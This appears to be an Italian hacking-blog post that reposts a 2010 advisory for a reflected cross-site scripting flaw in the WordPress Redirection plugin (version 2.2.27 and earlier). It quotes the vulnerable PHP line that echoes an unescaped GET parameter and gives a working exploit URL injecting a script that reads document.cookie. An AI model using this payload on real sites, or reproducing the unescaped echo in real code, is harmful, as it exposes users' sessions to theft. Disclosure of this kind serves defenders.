[WordPress] Redirection Plugin
# Exploit Title: [Wordpress] Redirection Plugin <= 2.2.27 XSS
# Date: 29-07-2010
# Author: clshack
# Software Link: http://wordpress.org/extend/plugins/redirection/
# Version: <=2.2.27
# Tested on: wordpress 3.0.1
Page: redirection/view/admin/log.php
Line:13
<input type="hidden" name="sub" value="<strong><?php echo $_GET['sub'] ?></strong>"/>Exploit:
wp-admin/tools.php?page=redirection.php&curpage=1&sub=log&sub="><script>alert(document.cookie)</script>Bisogna filtrare l’input :D
Approfondimenti XSS.
Related posts:
- [scanner]Plecost: A WordPress Penetration-Test for Plugins
- [security-update]Exploit WordPress 2.8.3
- Velocizza WordPress con Db-Cache
- [Metasploit]Sun Java Web Start Plugin Remote Code Excution
- [GUIDA]ETTERCAP E I SUOI PLUGIN :)
This entry was posted on Friday, July 30th, 2010 at 6:10 pm and is filed under Hacking. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
Tagged with: exploit • wordpress • xss






